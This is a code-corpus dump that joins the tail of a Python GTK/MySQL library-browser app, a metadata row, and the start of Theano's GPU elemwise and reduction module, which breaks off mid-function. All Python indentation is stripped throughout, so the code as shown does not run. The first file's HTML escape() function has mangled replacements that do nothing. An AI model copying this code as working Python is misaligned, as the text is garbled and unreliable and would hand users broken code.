parent = self.component['type'].append(None, child)
self.addRowToTreeView(typeData, child, parent)
else:
# Show all type
self.addRowToTreeView(typeData)
# Create, TreeView Layout
self.treeViewLayout(self.component['type'], self.addNewTypeToSelected, self.doNothing)
# create columns
self.createColumns(self.treeViewResult, [(0, 'Type')])
self.labelTitle.set_text("Add new type. Please select parent type")
log.LOG("END selectNewType")
def addNewTypeToSelected(self, widget, column, data):
log.LOG("START addNewTypeToSelected")
log.LOG("widget= %s path= %s column= %s data=%s" % (self, widget, column, data))
selection = widget.get_selection()
result = selection.get_selected()
if result:
model, iter = result
type_name = str(model.get_value(iter, 0))
type_id = model.get_value(iter, 1)
new_type = self.entry_dialog("Please entry new type to <tt>%s</tt>" % type_name)
if new_type:
ConMySQL.setType(new_type, type_id)
self.commonLayout()
self.labelTitle.set_text("Add new type '%s' to '%s'" % (new_type, type_name))
else:
self.print_error_message("Name is empty More <tt>help add</tt>")
log.LOG("END addNewTypeToSelected")
def getTypeTree(self, com):
log.LOG("START getTypeTree")
log.LOG("START getType")
# clean TreeStore
self.component['type'].clear()
typeData = ConMySQL.getTypeByTree()
# Show all type by pattern
if com:
types = ConMySQL.getType(' '.join(com))
for type in types:
child = (type['type'], type['id_type'])
parent = self.component['type'].append(None, child)
self.addRowToTreeView(typeData, child, parent)
else:
# Show all type
self.addRowToTreeView(typeData)
# Create, TreeView Layout
self.treeViewLayout(self.component['type'], self.getSelectedRowType, self.getExpandRow)
# create columns
self.createColumns(self.treeViewResult, [(0, 'Type')])
self.labelTitle.set_text("Type --> %s" % (' '.join(com) if com else "All"))
log.LOG("END getType")
log.LOG("END getTypeTree")
def updateRecord(self, com):
log.LOG("START updateRecord")
# clean TreeStore
self.component['search'].clear()
# Parse com
dPattern = defaultdict(list)
if com:
pattern = ' '.join(com)
for name in ['name', 'type', 'description', 'key_list', 'name_a']:
dPattern[name].append(pattern)
if dPattern:
rows = ConMySQL.getLibDefaultDick(dPattern)
else:
rows = ConMySQL.getLib()
for row in rows:
toadd = [row['id'], row['type'], row['name'], row['key_list'], row['description'], row['name_a'], row['date_a'].strftime("%Y-%m-%d %T")]
self.component['search'].append(toadd)
# Create, TreeView Layout
self.treeViewLayout(self.component['search'], self.getSelectedUpdate, self.doNothing, 2)
# create columns
self.createColumns(self.treeViewResult, self.mapColumnNameToNumber(self.configData['short']))
self.labelTitle.set_text("Update --> %s" % (' '.join(com) if com else "All"))
log.LOG("END updateRecord")
def createColumns(self, treeView, listColumnName):
log.LOG("START createColumns")
for i, name in listColumnName:
rendererText = gtk.CellRendererText()
column = gtk.TreeViewColumn(name, rendererText, text=i)
column.set_clickable(True)
column.set_sort_indicator(True)
column.set_sort_column_id(0)
treeView.append_column(column)
log.LOG("END createColumns")
def addRowToTreeView(self, typeData, parentName=('LOM', 1), parent=None):
log.LOG("START addRowToTreeView")
if not typeData.get(parentName):
return
else:
for child in typeData[parentName]:
newParent = self.component['type'].append(parent, [child[0], child[1]])
if typeData.get(child):
self.addRowToTreeView(typeData, child, newParent)
log.LOG("END addRowToTreeView")
def getKeysList(self, com):
log.LOG("START getKeysList")
# clean TreeStore
self.component['keys'].clear()
if com:
keys = ConMySQL.getUniqueKeys(' '.join(com))
else:
keys = ConMySQL.getUniqueKeys()
for key in keys:
self.component['keys'].append([key['key_name']])
# Create, TreeView Layout
self.treeViewLayout(self.component['keys'], self.getSelectedRowKey, self.doNothing)
# create columns
self.createColumns(self.treeViewResult, [(0, 'keys')])
self.labelTitle.set_text("Keys --> %s" % (' '.join(com) if com else "All"))
log.LOG("END getKeysList")
def mapColumnNameToNumber(self, nameList):
mapNumber = {
'ID': 0,
'Title': 1,
'Name': 2,
'Keys': 3,
'Description': 4,
'name_a': 5,
'data_a': 6}
return [(mapNumber[x], x) for x in nameList if x in mapNumber.keys()]
def getNews(self):
log.LOG("START getNews")
# clean TreeStore
self.component['news'].clear()
rows = ConMySQL.getNews(self.configData['user'])
ConMySQL.updateUser(self.configData['user'])
for row in rows:
toadd = [row['id'], row['type'], row['name'], row['key_list'], row['description'], row['name_a'], row['date_a'].strftime("%Y-%m-%d %T")]
self.component['news'].append(toadd)
# Create, TreeView Layout
self.treeViewLayout(self.component['news'], self.doNothing, self.getSelectedRow, 2)
# create columns
self.createColumns(self.treeViewResult, self.mapColumnNameToNumber(self.configData['short']))
self.labelTitle.set_text("News")
log.LOG("END getNews")
def getDigit(self):
log.LOG("START getDigit")
pass
log.LOG("END getDigit")
def getHisory(self):
log.LOG("START getDigit")
# clean TreeStore
self.component['history'].clear()
for row in enumerate(self.history):
self.component['history'].append(row)
# Create, TreeView Layout
self.treeViewLayout(self.component['history'], self.getSelectedHis, self.doNothing, 1)
# create columns
self.createColumns(self.treeViewResult, [(0, 'ID'), (1, 'History')])
self.labelTitle.set_text("History")
log.LOG("END getDigit")
def setOption(self, com):
log.LOG("START setOption")
if len(com) >= 2 and com[0] in self.configData.keys():
self.configData[com[0]] = ' '.join(com[1:])
elif not com:
self.getConfig()
message = ""
for k, v in self.configData.items():
if not k.startswith('_'):
message += "%s = %s\n" % (k, v)
self.labelLayout(message)
else:
self.print_error_message('INVALID SYNTAX')
self.setConfig()
log.LOG("END setOption")
def openWebBrowser(self, com):
log.LOG("START openWebBrowser")
import webbrowser
browser = webbrowser.BackgroundBrowser("gnome-open")
if len(com) >= 2 and com[0].startswith('-'):
option = com.pop(0)
if option in ['-s']:
url = "http://stackoverflow.com/search?q=" + '+'.join(com)
elif option in ['-u']:
url = "http://unix.stackexchange.com/search?q=" + '+'.join(com)
elif option in ['-g']:
url = "https://www.google.pl/search?q=" + '+'.join(com)
else:
return self.print_error_message('INVALID SYNTAX')
browser.open(url)
else:
self.print_error_message('INVALID SYNTAX')
log.LOG("END openWebBrowser")
def escape(s):
"escape html markup"
if isinstance(s, str):
s = s.replace("&", "&")
s = s.replace("\<", "<")
s = s.replace("\>", ">")
return s
def escapePattern(s):
"escape html markup"
if isinstance(s, str):
s = s.replace("\<", "[[:<:]]")
s = s.replace("\>", "[[:>:]]")
return s
| gpl-3.0 | -2,701,084,870,422,299,600 | 29.986869 | 148 | 0.561496 | false | 3.706742 | true | false | false |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/theano/sandbox/gpuarray/elemwise.py | 4 | 118800 | from __future__ import print_function
import copy
from theano.compat import izip
import numpy
import theano
from theano import Apply, scalar, config
from theano import scalar as scal
from six.moves import StringIO, xrange
from theano.gof.utils import MethodNotDefined
from theano.scalar import Scalar
from theano.tensor.elemwise import (Elemwise, DimShuffle, CAReduceDtype)
try:
import pygpu
from pygpu import gpuarray
from pygpu.tools import ScalarArg, ArrayArg
from pygpu.elemwise import ElemwiseKernel
from pygpu.reduction import ReductionKernel
from pygpu.gpuarray import dtype_to_typecode, dtype_to_ctype
except ImportError:
pass
from .basic_ops import (as_gpuarray_variable, HideC, GpuKernelBase, Kernel,
infer_context_name)
from .type import GpuArrayType
from .fp16_help import load_w, write_w
def _is_scalar(v):
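    """Tell whether `v` should be passed to the kernel as a scalar.

    GpuElemwise only ever receives GpuArray variables, so this always
    answers False and make_argument() wraps everything as an ArrayArg.
    """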
    return False
def make_argument(v, name):
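    """Wrap the Theano variable `v` as a pygpu kernel argument called `name`."""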
if _is_scalar(v):
return ScalarArg(numpy.dtype(v.type.dtype), name)
else:
return ArrayArg(numpy.dtype(v.type.dtype), name)
def ensure_allocated(storage, shape, dtype, ctx):
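    """Return a GpuArray of the given shape and dtype taken from `storage`,
    allocating a new one on context `ctx` if the cached array is missing
    or has the wrong shape. The result is written back into `storage[0]`.
    """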
odat = storage[0]
if odat is not None:
if odat.shape != shape:
            # It is unsafe to try to resize odat in place,
            # so we have to allocate fresh output storage.
odat = None
if odat is None:
odat = pygpu.empty(shape, dtype=dtype, context=ctx)
storage[0] = odat
return odat
def as_C_string_const(s):
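    """Quote each line of `s` as a C string literal ending in \\n, one
    literal per line, so the C compiler concatenates them back into a
    single constant string.
    """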
return '\n'.join('"%s\\n"' % (l.replace('"', '\\"'))
for l in s.split('\n'))
class GpuElemwise(GpuKernelBase, HideC, Elemwise):
"""
Elemwise on the GPU.
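
    A minimal usage sketch (illustrative only; assumes a configured
    gpuarray context and uses the ``add`` scalar op)::

        from theano import scalar
        gpu_add = GpuElemwise(scalar.add)  # same constructor as Elemwise
        node = gpu_add.make_node(x, y)     # x, y: GpuArray variables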
"""
nin = property(lambda self: self.scalar_op.nin)
nout = property(lambda self: self.scalar_op.nout)
_f16_ok = True
def __str__(self):
if self.name is not None:
return self.name
items = str(sorted(self.inplace_pattern.items()))
return "GpuElemwise{%s}%s<gpuarray>" % (self.scalar_op, items)
def make_node(self, *inputs):
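        """Build an Apply node whose inputs and outputs are GpuArrays.

        Inputs are lifted to GpuArray variables in a common context, and
        the scalar op's C support code is vetted here so that unsupported
        ops raise SupportCodeError at graph-construction time.
        """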
ctx_name = infer_context_name(*inputs)
res = Elemwise.make_node(self, *inputs)
outputs = [GpuArrayType(broadcastable=o.type.broadcastable,
context_name=ctx_name,
dtype=o.type.dtype)() for o in res.outputs]
if len(outputs) > 1:
raise NotImplementedError()
inputs = [as_gpuarray_variable(i, ctx_name) for i in inputs]
node = Apply(self, inputs, outputs)
# Try to generate the kernel to catch SupportCodeErrors
try:
scal_ins = [scalar.get_scalar_type(i.dtype) for i in node.inputs]
scal_out = [scalar.get_scalar_type(o.dtype) for o in node.outputs]
fake_node = Apply(self.scalar_op, [i() for i in scal_ins],
[o() for o in scal_out])
code = self.scalar_op.c_support_code_apply(fake_node, "test")
if code:
raise SupportCodeError(code)
except MethodNotDefined:
pass
try:
support_code = self.scalar_op.c_support_code()
if (support_code.strip() != "#define THEANO_MACRO_MOD(x,y) (x % y)" and
support_code.strip() != ""):
# The macro is fine, the C++ struct is not.
raise SupportCodeError(support_code)
except MethodNotDefined:
pass
return node
def get_params(self, node):
return node.inputs[0].type.context
def generate_kernel(self, node, nodename):
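        """Build the pygpu ElemwiseKernel that evaluates this node.

        The scalar op's C code is rendered once per element, float16
        values are routed through float32 temporaries, and numpy type
        names are rewritten to their gpuarray equivalents.
        """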
inps = [make_argument(i, 'i%d' % (n,)) for n, i in
enumerate(node.inputs)]
scal_v_ins = [scalar.get_scalar_type(i.dtype) for i in node.inputs]
outs = [make_argument(o, 'o%d' % (n,)) for n, o in
enumerate(node.outputs) if n not in self.inplace_pattern]
scal_v_outs = [scalar.get_scalar_type(o.dtype) for o in node.outputs]
fake_node = Apply(self.scalar_op, [i() for i in scal_v_ins],
[o() for o in scal_v_outs])
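        # Inputs are read per element as "iN[i]"; float16 inputs go through
        # __half2float() because the scalar C code computes in float32.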
scal_in = [i.name + '[i]' if i.dtype != 'float16' else
'__half2float(' + i.name + '[i])' for i in inps]
scal_out = []
oi = 0
scal_f16 = []
for n in range(len(node.outputs)):
if n in self.inplace_pattern:
arg = inps[self.inplace_pattern[n]]
else:
arg = outs[oi]
oi += 1
if arg.dtype == 'float16':
scal_f16.append(('tmpf16%i' % (len(scal_f16),), arg))
scal_out.append(scal_f16[-1][0])
else:
scal_out.append(arg.name + '[i]')
kop = self.scalar_op.c_code(fake_node, nodename + '_scalar',
scal_in, scal_out,
dict(fail='return;'))
if scal_f16:
            # If we have float16 scalars on output, we have to wrap
            # them and insert a stand-in float32 variable, since
            # float16 arithmetic is not available in the scalar C code.
code = ["{"]
for f in scal_f16:
code.append('ga_float %s;' % (f[0],))
# XXX: The replace is an ugly hack to make sure temp
            # variables in the middle are float32
code.append(kop.replace('npy_float16', 'ga_float'))
for f in scal_f16:
code.append('%s[i] = __float2half_rn(%s);' % (f[1].name, f[0]))
code.append('}')
kop = '\n'.join(code)
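            # Illustratively (a sketch, with hypothetical generated names),
            # for a single float16 output the wrapped body ends up roughly as:
            #   {
            #   ga_float tmpf160;
            #   tmpf160 = __half2float(i0[i]) + __half2float(i1[i]);
            #   o0[i] = __float2half_rn(tmpf160);
            #   }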
support_code = ""
try:
            # We accept only some c_support_code().
            # This filtering is done in make_node().
support_code += self.scalar_op.c_support_code()
except MethodNotDefined:
pass
for npy, ga in [("npy_uint8", "ga_ubyte"),
("npy_uint16", "ga_ushort"),
("npy_uint32", "ga_uint"),
("npy_uint64", "ga_ulong"),
("npy_int8", "ga_byte"),
("npy_int16", "ga_short"),
("npy_int32", "ga_int"),
("npy_int64", "ga_long"),
("npy_float16", "ga_half"),
("npy_float32", "ga_float"),
("npy_float64", "ga_double"),
]:
kop = kop.replace(npy, ga)
return ElemwiseKernel(self.get_params(node), inps + outs, kop,
preamble=support_code)
def c_headers(self):
return ['<numpy_compat.h>', '<gpuarray/types.h>']
def c_support_code(self):
return self.scalar_op.c_support_code()
def _gpu_kernel_code(self, node, nodename):
# This is useless by itself, but will serve an eventual c_code
# implementation
k = self.generate_kernel(node, nodename)
nd = node.inputs[0].type.ndim
res = []
for i in range(0, nd + 1):
res.append(k.render_basic(i, name="elem_" + str(i)) + ';')
res.append(k.contig_src + ';')
return '\n'.join(res)
def gpu_kernels(self, node, nodename):
src = self._gpu_kernel_code(node, nodename)
nd = node.outputs[0].ndim
params = ['uintp']
params.extend('uintp' for _ in range(nd))
num_inputs = len(node.inputs)
num_outputs = len(node.outputs)
for n in range(num_inputs + num_outputs):
if (n - len(node.inputs)) in self.inplace_pattern:
continue
params.extend([gpuarray.GpuArray, 'uintp'])
params.extend('intp' for _ in range(nd))
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
return [Kernel(code=src, name="elem_%d" % nd, params=params,
flags=Kernel.get_flags(node.inputs[0].type.dtype,
acc_dtype,
node.outputs[0].type.dtype),
objvar='elem_%d_%s' % (nd, nodename))]
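    # The parameter layout above mirrors the call site in c_code():
    # numEls, then one size_t per output dim, then for every non-inplace
    # array a (data, offset, stride_0..stride_{nd-1}) group.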
def c_code(self, node, name, inputs, outputs, sub):
if node.inputs[0].type.context.kind != 'cuda':
raise MethodNotDefined('cuda only')
nd = node.outputs[0].ndim
fail = sub["fail"]
initial_dims = ','.join('1' for i in xrange(nd))
opname = str(self.scalar_op)
ctx = sub['params']
        # emit the broadcast pattern of each input as a C array
emitted_inames = {}
num_kernel_params = 1 + nd + len(inputs + outputs) * (2 + nd)
code = """
size_t n_blocks = 0;
size_t threads_per_block = 0;
size_t numEls = 0;
const ssize_t zero = 0;
void *kernel_params[%(num_kernel_params)d] = {0};
int err;
""" % locals()
if nd > 0:
code += """
size_t dims[%(nd)s] = {%(initial_dims)s};
""" % locals()
else:
code += """
size_t *dims = NULL;
"""
for idx, iname in enumerate(inputs):
if iname in emitted_inames:
assert emitted_inames[iname] is node.inputs[idx]
continue
broadcasts = map(int, node.inputs[idx].broadcastable)
broadcasts = ', '.join(map(str, broadcasts))
nd = node.inputs[idx].ndim
if nd > 0:
code += """
int broadcasts_%(iname)s[%(nd)s] = {%(broadcasts)s};
""" % locals()
else:
code += """
int *broadcasts_%(iname)s = NULL;
""" % locals()
emitted_inames[iname] = node.inputs[idx]
# check that all inputs have valid dimensions
emitted_inames = {}
for idx, iname in enumerate(inputs):
if iname in emitted_inames:
continue
code += """
if (%(nd)s != PyGpuArray_NDIM(%(iname)s))
{
PyErr_Format(PyExc_TypeError,
"need %(nd)s dims, not %%u",
PyGpuArray_NDIM(%(iname)s));
%(fail)s;
}
for (int i = 0; i< %(nd)s; ++i)
{
dims[i] = (dims[i] == 1) ? PyGpuArray_DIMS(%(iname)s)[i] : dims[i];
if ((!(broadcasts_%(iname)s[i] &&
PyGpuArray_DIMS(%(iname)s)[i] == 1)) &&
(dims[i] != PyGpuArray_DIMS(%(iname)s)[i]))
{
PyErr_Format(PyExc_ValueError,
"GpuElemwise. Input dimension mis-match. Input"
" %(idx)d (indices start at 0) has shape[%%d] == %%llu"
", but the output's size on that axis is %%llu.",
i,
(unsigned long long)PyGpuArray_DIMS(%(iname)s)[i],
(unsigned long long)dims[i]
);
%(fail)s;
}
}
""" % locals()
emitted_inames[iname] = True
# check that all outputs have valid dimensions
for idx, oname in enumerate(outputs):
typecode = dtype_to_typecode(node.outputs[idx].dtype)
if idx not in self.inplace_pattern.keys():
code += """
for (int i = 0; (i< %(nd)s) && (%(oname)s); ++i) {
if (dims[i] != PyGpuArray_DIMS(%(oname)s)[i])
{
Py_DECREF(%(oname)s);
%(oname)s = NULL;
}
}
if (%(oname)s && !GpuArray_CHKFLAGS(&(%(oname)s->ga), GA_C_CONTIGUOUS))
{
Py_XDECREF(%(oname)s);
%(oname)s = NULL;
}
if (NULL == %(oname)s)
{
%(oname)s = pygpu_empty(%(nd)d, dims,
%(typecode)s, GA_C_ORDER,
%(ctx)s, Py_None);
if (!%(oname)s) {
%(fail)s
}
}
""" % locals()
else:
input_idx = self.inplace_pattern[idx]
iname = inputs[input_idx]
code += """
Py_XDECREF(%(oname)s);
%(oname)s = %(iname)s;
Py_INCREF(%(oname)s);
for (int i = 0; (i< %(nd)s) && (%(oname)s); ++i) {
if (dims[i] != PyGpuArray_DIMS(%(oname)s)[i])
{
PyErr_Format(PyExc_ValueError,
"GpuElemwise. Output dimension mis-match. Output"
" %(idx)d (indices start at 0), working inplace"
" on input %(input_idx)s, has shape[%%i] == %%llu"
", but the output's size on that axis is %%llu.",
i,
(unsigned long long)PyGpuArray_DIMS(%(oname)s)[i],
(unsigned long long)dims[i]
);
Py_DECREF(%(oname)s);
%(oname)s = NULL;
%(fail)s;
}
}
""" % locals()
z = outputs[0]
code += """numEls = PyGpuArray_SIZE(%(z)s);
//first use at least a full warp
threads_per_block = std::min(numEls, (size_t)32); //WARP SIZE
//next start adding multiprocessors
// UP TO NUMBER OF MULTIPROCESSORS, use 30 for now.
n_blocks = std::min(numEls/threads_per_block +
(numEls %% threads_per_block?1:0),
(size_t)30);
// next start adding more warps per multiprocessor
if (threads_per_block * n_blocks < numEls)
threads_per_block = std::min(numEls/n_blocks, (size_t) 256);
""" % locals()
kname = 'elem_%d_%s' % (nd, name)
param = ["(void *)&numEls"]
for i in range(nd):
param.append("(void *)&%(z)s->ga.dimensions[%(i)d]" % dict(z=outputs[0],
i=i))
for n, (name, var) in enumerate(zip(inputs + outputs,
node.inputs + node.outputs)):
if (n - len(inputs)) in self.inplace_pattern:
continue
dtype = dtype_to_ctype(var.dtype)
param.append("(void *)%(name)s->ga.data" % locals())
param.append("(void *)&%(name)s->ga.offset" % locals())
for i in range(nd):
param.append("PyGpuArray_DIMS(%(name)s)[%(i)d] == 1 ? (void *)&zero: (void *)&PyGpuArray_STRIDES(%(name)s)[%(i)d]" % locals())
for n, p in enumerate(param):
code += "kernel_params[%(n)d] = %(p)s;\n" % locals()
code += """
err = GpuKernel_call(&%(kname)s, 1, &threads_per_block, &n_blocks, 0, kernel_params);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(kname)s: %%s.",
GpuKernel_error(&%(kname)s, err));
%(fail)s;
}
""" % dict(kname=kname, fail=fail)
if config.gpuarray.sync:
code += """
err = GpuArray_sync(&%(z)s->ga);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(kname)s: %%s.",
GpuKernel_error(&%(kname)s, err));
%(fail)s;
}
""" % locals()
return str(code)
def perform(self, node, inputs, output_storage, ctx):
# Try to reuse the kernel from a previous call to hopefully
# avoid recompiling
if not hasattr(node, '_cache_elemwise_k'):
node._cache_elemwise_k = self.generate_kernel(node, "kcode")
out_shape = []
for values in izip(*[input.shape for input in inputs]):
if any(v == 0 for v in values):
# All non-broadcasted dimensions should be zero
assert max(values) <= 1
out_shape.append(0)
else:
out_shape.append(max(values))
out_shape = tuple(out_shape)
args = copy.copy(inputs)
for n, (stor, out) in enumerate(izip(output_storage, node.outputs)):
if n in self.inplace_pattern:
stor[0] = inputs[self.inplace_pattern[n]]
else:
args.append(ensure_allocated(stor, out_shape, out.type.dtype, ctx))
node._cache_elemwise_k(*args, broadcast=True)
if config.gpuarray.sync:
output_storage[0][0].sync()
def c_code_cache_version(self):
ver = self.scalar_op.c_code_cache_version()
if ver:
return (4, ver)
else:
return ver
class SupportCodeError(Exception):
"""
We do not support certain things (such as the C++ complex struct).
"""
class GpuDimShuffle(HideC, DimShuffle):
"""
DimShuffle on the GPU.
"""
_f16_ok = True
def make_node(self, input):
ctx_name = infer_context_name(input)
res = DimShuffle.make_node(self, input)
otype = GpuArrayType(dtype=res.outputs[0].type.dtype,
broadcastable=res.outputs[0].type.broadcastable,
context_name=ctx_name)
input = as_gpuarray_variable(input, ctx_name)
return Apply(self, [input], [otype()])
def __str__(self):
if self.inplace:
s = "InplaceGpuDimShuffle{%s}"
else:
s = "GpuDimShuffle{%s}"
return s % (','.join(str(x) for x in self.new_order))
def perform(self, node, inp, out):
input, = inp
storage, = out
res = input
res = res.transpose(self.shuffle + self.drop)
shape = list(res.shape[:len(self.shuffle)])
for augm in self.augment:
shape.insert(augm, 1)
res = res.reshape(shape)
if not self.inplace:
res = res.copy()
storage[0] = res
def c_support_code_apply(self, node, name):
def copy_shape(nd_out):
stmts = []
e = 0
for d in range(nd_out):
if d in self.augment:
stmts.append("sh[%s] = 1;" % (d,))
else:
stmts.append("sh[%s] = tmp->ga.dimensions[%s];" % (d, e))
e += 1
return '\n '.join(stmts)
return """
static const unsigned int %(name)s_ax[] = {%(shuffle)s};
static PyGpuArrayObject *%(name)s_f(PyGpuArrayObject *a) {
PyGpuArrayObject *res, *tmp;
size_t sh[%(nd_out)s];
tmp = pygpu_transpose(a, %(name)s_ax);
if (!tmp) return NULL;
%(copy_shape)s
res = pygpu_reshape(tmp, %(nd_out)s, sh, GA_ANY_ORDER, 1, -1);
Py_DECREF(tmp);
return res;
}
""" % dict(shuffle=', '.join(str(a) for a in (self.shuffle + self.drop)),
name=name, nd_out=len(self.new_order),
copy_shape=copy_shape(len(self.new_order)))
def c_code(self, node, name, inputs, outputs, sub):
d = dict(name=name, fail=sub['fail'], inp=inputs[0], out=outputs[0],
nd=len(self.input_broadcastable))
process = """
PyGpuArrayObject *tmp = NULL;
if (%(inp)s->ga.nd != %(nd)s) {
PyErr_SetString(PyExc_TypeError, "input nd");
%(fail)s
}
Py_XDECREF(%(out)s);
%(out)s = %(name)s_f(%(inp)s);
if (%(out)s == NULL) {%(fail)s}
""" % d
if not self.inplace:
process += """
tmp = pygpu_copy(%(out)s, GA_ANY_ORDER);
Py_DECREF(%(out)s);
if (!tmp) {
%(out)s = NULL;
%(fail)s
}
%(out)s = tmp;
""" % d
return process
def c_code_cache_version(self):
return (5,)
class GpuCAReduceCuda(GpuKernelBase, HideC, CAReduceDtype):
"""
GpuCAReduceCuda is a Reduction along some dimensions by a scalar op.
Parameters
----------
reduce_mask
The dimensions along which to reduce. The `reduce_mask` is a tuple of
booleans (actually integers 0 or 1) that specify for each input
dimension, whether to reduce it (1) or not (0).
pre_scalar_op
If present, must be a scalar op with only 1 input. We will execute it
on the input value before reduction.
Examples
--------
When scalar_op is a theano.scalar.basic.Add instance:
- reduce_mask == (1,) sums a vector to a scalar
- reduce_mask == (1,0) computes the sum of each column in a matrix
- reduce_mask == (0,1) computes the sum of each row in a matrix
- reduce_mask == (1,1,1) computes the sum of all elements in a 3-tensor.
Notes
-----
Any reduce_mask of all zeros is a sort of 'copy', and may be removed during
graph optimization.
This Op is a work in progress.
    This op was recently upgraded from just GpuSum to a general CAReduce. Not
many code cases are supported for scalar_op being anything other than
scal.Add instances yet.
Important note: if you implement new cases for this op, be sure to
benchmark them and make sure that they actually result in a speedup.
GPUs are not especially well-suited to reduction operations so it is
quite possible that the GPU might be slower for some cases.
"""
__props__ = ('axis', 'reduce_mask', 'dtype', 'acc_dtype', 'scalar_op',
'pre_scalar_op')
_f16_ok = True
def __init__(self, scalar_op, axis=None,
reduce_mask=None, dtype=None, acc_dtype=None,
pre_scalar_op=None):
if reduce_mask is not None:
reduce_mask = tuple(reduce_mask)
self.reduce_mask = reduce_mask
# used to make sure that calls to scalar op
# have unique name arguments
self._n_scalar_op_calls = 0
CAReduceDtype.__init__(self, scalar_op, axis=axis,
dtype=dtype, acc_dtype=acc_dtype)
self.pre_scalar_op = pre_scalar_op
if pre_scalar_op:
assert pre_scalar_op.nin == 1
def __str__(self):
pre = ""
if self.pre_scalar_op:
pre = "pre=%s,red=" % str(self.pre_scalar_op)
ax = ''
if self.axis is not None:
ax = '{%s}' % (', '.join(str(x) for x in self.axis),)
return "GpuCAReduceCuda{%s%s}%s" % (pre, str(self.scalar_op), ax)
def __setstate__(self, d):
self.__dict__.update(d)
# For unpickling of old ops.
if not hasattr(self, "pre_scalar_op"):
self.pre_scalar_op = None
def make_node(self, x):
x = as_gpuarray_variable(x, infer_context_name(x))
if x.type.context.kind != 'cuda':
raise TypeError("GpuCAReduceCuda doesn't work for non-cuda devices")
ret = super(GpuCAReduceCuda, self).make_node(x)
self = copy.copy(self)
self.axis = ret.op.axis
if self.pre_scalar_op:
            # Currently we have only tested pre_scalar_ops that don't
            # cause upcasting.
assert Elemwise(self.pre_scalar_op)(x).dtype == x.dtype
if self.reduce_mask is None:
if self.axis is None:
reduce_mask = [1] * x.type.ndim
else:
reduce_mask = [0] * x.type.ndim
for a in self.axis:
assert reduce_mask[a] == 0
reduce_mask[a] = 1
self.reduce_mask = tuple(reduce_mask)
if (x.type.ndim != len(self.reduce_mask)):
raise TypeError("x must have rank %i" % len(self.reduce_mask))
if ("complex" in x.dtype or
"complex" in ret.outputs[0].dtype or
"complex" in self._acc_dtype(x.dtype)):
raise NotImplementedError("We don't support complex in gpu reduction")
return Apply(self, [x], [GpuArrayType(ret.outputs[0].dtype,
ret.outputs[0].type.broadcastable,
context_name=x.type.context_name)()])
def get_params(self, node):
return node.inputs[0].type.context
def perform(self, node, inp, out, ctx):
theano.Op.perform(self, node, inp, out, ctx)
def supports_c_code(self, inputs):
"""
        Returns True if the current op and reduce pattern have functioning C code.
"""
# If we don't even have the right method, we certainly
# don't support the C code
# (This is the test that used to be implemented by
# local_gpu_sum)
pattern = (''.join(str(i) for i in self.reduce_mask))
if not hasattr(self, 'c_code_reduce_%s' % pattern):
return False
# Now that this is a general reduction op, we might
# have a method for a pattern, but that pattern
# might not be implemented for the current scalar op.
# To detect this more complicated situation, we
# make fake arguments to c_code, try to run them,
# and see if NotImplementedError gets raised.
node = self.make_node(*inputs)
name = 'fake_name'
inp = ['fake_input_name_%d' % i for i in xrange(len(inputs))]
out = ['fake_output_name_%d' % i for i in xrange(len(node.outputs))]
sub = {'fail': 'fake failure code', 'params': 'fake context'}
try:
self.c_code(node, name, inp, out, sub)
self.c_support_code_apply(node, name)
except NotImplementedError:
return False
return True
def c_headers(self):
return ['<numpy_compat.h>', '<gpuarray/types.h>']
def c_code(self, node, name, inp, out, sub):
x, = inp
z, = out
nd_in = node.inputs[0].type.ndim
nd_out = node.outputs[0].type.ndim
# For complex, we need to use theano_complex* in the c code to
        # have it run. But libgpuarray doesn't understand it.
in_dtype = node.inputs[0].type.dtype_specs()[1]
out_dtype = node.outputs[0].type.dtype_specs()[1]
gin_dtype = "npy_" + node.inputs[0].dtype
gout_dtype = "npy_" + node.outputs[0].dtype
assert nd_in - nd_out == sum(self.reduce_mask)
sio = StringIO()
fail = sub['fail']
ctx = sub['params']
# check input
print("""
if (PyGpuArray_NDIM(%(x)s) != %(nd_in)s)
{
PyErr_Format(PyExc_TypeError,
"required nd=%(nd_in)s, got nd=%%u", PyGpuArray_NDIM(%(x)s));
%(fail)s;
}
""" % locals(), file=sio)
# It might be nice to use a property of the op class to do this,
# but tensor.elemwise.CAReduce has this exact same check so I guess
# this is OK to do
if self.scalar_op in [scal.minimum, scal.maximum]:
conds = ["(PyGpuArray_DIMS(%s)[%d] == 0)" % (x, i)
for i in xrange(nd_in)
if self.reduce_mask[i]]
assert len(conds) > 0
cond = "(" + " || ".join(conds) + ")"
print("""
if %(cond)s
{
PyErr_Format(PyExc_ValueError," tried to reduce a 0-length axis.");
%(fail)s;
}
""" % locals(), file=sio)
#
# alloc an output if we need one
#
        # check the basics of our output
print("""
if ( !%(z)s
|| (PyGpuArray_NDIM(%(z)s) != %(nd_out)s)
""" % locals(), file=sio)
# ensure that the output has the right non-reduced dimensions
j = 0
for i in xrange(nd_in):
if not self.reduce_mask[i]:
print(" || (PyGpuArray_DIMS(%(z)s)[%(j)s] != PyGpuArray_DIMS(%(x)s)[%(i)d]) " % locals(), file=sio)
j += 1
print("""
)
{
""" % locals(), file=sio)
if nd_out > 0:
print("size_t new_dims[%(nd_out)s]; " % locals(), file=sio)
else:
print("size_t *new_dims=NULL; ", file=sio)
j = 0
for i in xrange(nd_in):
if not self.reduce_mask[i]:
print('new_dims[%(j)s] = PyGpuArray_DIMS(%(x)s)[%(i)s];' % locals(), file=sio)
j += 1
out_typecode = dtype_to_typecode(gout_dtype[4:])
print("""
Py_XDECREF(%(z)s);
%(z)s = pygpu_empty(%(nd_out)s, new_dims,
%(out_typecode)s, GA_C_ORDER,
%(ctx)s, Py_None);
if (NULL == %(z)s)
{
PyErr_Format(PyExc_RuntimeError, "Failed to allocate output");
%(fail)s;
}
}
""" % locals(), file=sio)
# \begin bracket the reduction in a check that there is
# actually work to do
if getattr(self.scalar_op, 'identity', None) == 0:
zero_shp = "GpuArray_memset(&%(z)s->ga, 0)" % locals()
# TODO: elif getattr(self.scalar_op, 'identity', None) == 1:
else:
scalar_op = self.scalar_op
zero_shp = """
PyErr_Format(PyExc_NotImplementedError,
"GpuCAReduceCuda not implemented when input shape is 0"
" for this scalar_op: %(scalar_op)s");
%(fail)s;
""" % locals()
print("""
if (PyGpuArray_SIZE(%(z)s) && ! PyGpuArray_SIZE(%(x)s)){
%(zero_shp)s;
}
else if (PyGpuArray_SIZE(%(z)s))
{
